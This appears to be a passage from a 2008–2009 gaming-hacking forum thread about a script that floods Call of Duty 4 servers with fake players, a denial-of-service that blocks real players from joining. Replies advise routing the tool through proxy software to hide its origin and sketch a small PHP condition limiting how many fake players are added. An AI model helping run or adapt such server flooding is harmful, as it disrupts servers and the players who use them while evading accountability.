am gonna have a fiddle about see what i can find in the next few days i need to backup my data and format before i do anything tho my pc is playing up ahh well.


 
 Post subject: Re: Fake Player DoS -- COD4
PostPosted: 29 Dec 2008 23:48 

Joined: 27 Jun 2008 07:41
Posts: 27
Hello,

I was able to get the program to work although I have a question.. Can this program be run through a proxy?

Thanks


 
 Post subject: Re: Fake Player DoS -- COD4
PostPosted: 30 Dec 2008 16:45 

Joined: 24 Sep 2007 02:12
Posts: 1114
Location: http://sethioz.co.uk
everything can be run thru a proxy, use either sockscap or proxyfirewall.
both are free and both can run any program thru a proxy (just google).


 
 Post subject: Re: Fake Player DoS -- COD4
PostPosted: 30 Dec 2008 18:16 

Joined: 27 Jun 2008 07:41
Posts: 27
Alright thank you ! :D


 
 Post subject: Re: Fake Player DoS -- COD4
PostPosted: 07 Jan 2009 23:24 

Joined: 07 Jan 2009 23:19
Posts: 13
I'm actually confused on this. Will this allow people to join? Lets say, you have a server of 40, and its full. Is there a way to make it cut off a few like open 3-5 slots so people can see there's room and join? Then from there, when one actual player joins, it'll kick one fake player out?

Another question. Will this work for COD5? I've seen the fake connecting bots on a server I used to play on, but the clan broke apart and all of the servers on COD5, COD4, TF2, and a couple others all shut down.


 
 Post subject: Re: Fake Player DoS -- COD4
PostPosted: 08 Jan 2009 04:42 

Joined: 16 Aug 2007 06:25
Posts: 367
Evo916 wrote:
I'm actually confused on this. Will this allow people to join? Lets say, you have a server of 40, and its full. Is there a way to make it cut off a few like open 3-5 slots so people can see there's room and join? Then from there, when one actual player joins, it'll kick one fake player out?

Another question. Will this work for COD5? I've seen the fake connecting bots on a server I used to play on, but the clan broke apart and all of the servers on COD5, COD4, TF2, and a couple others all shut down.


You could probably modify the script to query the server's current player amount, and have an if statement to only allow X amount of fake players to join based on how many are already in there. When that limit is reached, stop adding fake players. For example, you want 4 free slots in a 40 man server:

Quote:
if ($currentplayers >= 36) {
    echo("did nothing, too many players");
} else {
    // add your code here for a fake player
}


But this script is probably not what you want. These fake players timeout on their own, so there's no way to "kick" them unless you're an admin. Also, it might be difficult to detect a fake player VS a real player with just the script alone. You're probably best off looking for some type of server-side mod that can add X amount of "bots", and remove 1 each time a real player connects. Though I'm not sure if one exists for CoD4 or 5 :(. The script in this thread is mainly for flooding a server with fake players, disallowing anyone to join.

Also, this script will not work for CoD5 as far as I know (tried the CoD5 demo and got confused). I downloaded the retail game, and have been meaning to test it out and see the new connect packets to see if I can figure it out again. Just need to get motivated to sit down and try it out :P


 Post subject: Re: Fake Player DoS -- COD4
PostPosted: 08 Jan 2009 05:38 

Joined: 07 Jan 2009 23:19
Posts: 13
I see. Well, I do have my own server, so I do have admin powers, but now that I know that you had COD5, I wish I had actually looked into this before the guy discontinued his server so you would know what I was talking about. My problem is that I'm a complete novice at having my own server, but I finally got the basics down. Now I just need people in it :P But yes, from what people have been telling me, it's possible with a mod, but I have no clue where to find it. I've searched Google practically all day yesterday and today, with the exception of a few breaks of course. Any clue as to how I may find it? Sorry to kind of go off-topic on your thread, but I thought this might be what I was looking for!

Sorry again!


 Post subject: Re: Fake Player DoS -- COD4
PostPosted: 08 Jan 2009 05:55 

Joined: 07 Jan 2009 23:19
Posts: 13
You can really, really, really be super helpful to me if you can somehow figure this out with me! lol Motivation to help someone! haha. I'm really itching to get this going. I wish I didn't even need to do this, but the server that I played on, I really enjoyed playing in it. Basically the only server I played on, and now it's gone. Tried playing in some other servers that have decent ping for me but I just didn't like the configs, so I decided to rent one out on the spot without realizing how hard it was to get people to join without this! Now that I've thought about it, it's pretty much a waste of money for an idling server. I asked the person that was running the server if he could populate my server with what he did with his server, but he said no because he didn't like the company that I bought the server from, which was the cheapest, so an easy decision for me, and because it's not what he wants to play, which is hardcore team deathmatch, exactly how his server was. So this kind of bugged me, so I tried to figure it out on my own, and ran into a major problem: I don't have a clue what this is, or how to do it. :P Well, that's my story. Hope you get motivated! ;) lol


 Post subject: Re: Fake Player DoS -- COD4
PostPosted: 08 Jan 2009 08:53 

Joined: 07 Jan 2009 23:19
Posts: 13
As I was doing more research, I found this!

http://www.noobflicks.com/watch/3977/fa ... f2_servers

This is actually the exact clan server I was playing in, but for COD5.

